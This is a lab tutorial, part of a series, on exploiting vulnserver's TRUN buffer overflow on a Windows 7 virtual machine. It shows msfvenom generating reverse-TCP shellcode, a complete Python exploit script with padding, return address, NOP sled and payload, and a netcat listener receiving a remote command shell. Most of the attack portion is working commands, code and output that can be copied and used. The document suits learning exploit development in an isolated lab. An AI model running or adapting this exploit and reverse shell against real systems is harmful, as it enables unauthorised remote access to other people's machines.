6.3 : Classic buffer overflow - Win32 buffer overflow (Part VIII)

7. Generate a rootkit from metasploit msfvenom, append it to the payload without exploding the buffer (continue)

Lets get back to our kali, we need to use msfvenom for generating a reverse tcp shell back to our machine.

If you are curious, we can -l payloads to list all available attacks.

root@kali:~/Desktop/exploits# msfvenom -l payloads | grep windows
    cmd/windows/adduser                                 Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
    cmd/windows/bind_lua                                Listen for a connection and spawn a command shell via Lua
    cmd/windows/bind_perl                               Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_perl_ipv6                          Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
...



root@kali:~/Desktop/exploits# msfvenom --list f

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python

Lets generate windows/shell_reverse_tcp payload

root@kali:~/Desktop/exploits# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4"
"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54"
"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3"
"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51"
"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4"
"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65"
"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e"
"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0"
"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8"
"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab"
"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c"
"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b"
"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35"
"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4"
"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d"
"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e"
"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99"
"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56"
"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0"
"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15"
"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f"
"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7"
"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37"
"\xda\xbd\xcc\xe4\xdb\x97";

-f c : into a C program
EXITFUNC=thread : dont break the thread unless we exit
-b \x00 : dont use bad char \x00

Lets import this exploit into our script.
exploit.py

import socket, sys


def prope(message):
    """
    prope server

    :param message: request message
    :return: void
    """
    host = "192.168.56.102"
    port = 9999
    res = None
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.connect((host, port))
        my_socket.settimeout(10)  # add this to prevent freeze the connection
        my_socket.recv(2048).decode()
        my_socket.send(message)
        res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
        my_socket.close()
        # hide the success , look for failure, we need crash. we need failure.
        print("[success] %s:%s %s => %s" % (host, port, message, res))
    except:
        print("[error] %s:%s %s => None" % (host, port, len(message)))  # modify the output for testing ttl length
        raise
        # sys.exit()


def main():
    # memory address 625011af
    # shell = '\x62\x50\x11\xaf'
    shell = b"\xaf\x11\x50\x62"
    msf = b"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4" + \
          b"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54" + \
          b"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3" + \
          b"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51" + \
          b"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4" + \
          b"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65" + \
          b"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e" + \
          b"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0" + \
          b"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8" + \
          b"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab" + \
          b"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c" + \
          b"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b" + \
          b"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35" + \
          b"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4" + \
          b"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d" + \
          b"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e" + \
          b"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99" + \
          b"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56" + \
          b"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0" + \
          b"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15" + \
          b"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f" + \
          b"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7" + \
          b"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37" + \
          b"\xda\xbd\xcc\xe4\xdb\x97"
    # shell = b"BBBB"
    payload = b"TRUN ." + b"A" * 2006 + shell + b"\x90" * 16 + msf
    # print(payload)
    prope(payload)
    print("completed test")


if __name__ == "__main__":
    main()

Before injecting our shell, we need to add a few \x90 nocs to seperate the shell and memory address to prevent the poisoning issue.

Back to our kali, lets start the server and the script

root@kali:~/Desktop/exploits# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.102.
Ncat: Connection from 192.168.56.102:49602.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe

C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe

C:\Users\IEUser\Desktop\vulnserver>whoami
whoami
iewin7\ieuser

C:\Users\IEUser\Desktop\vulnserver>

Got it.

Exploited.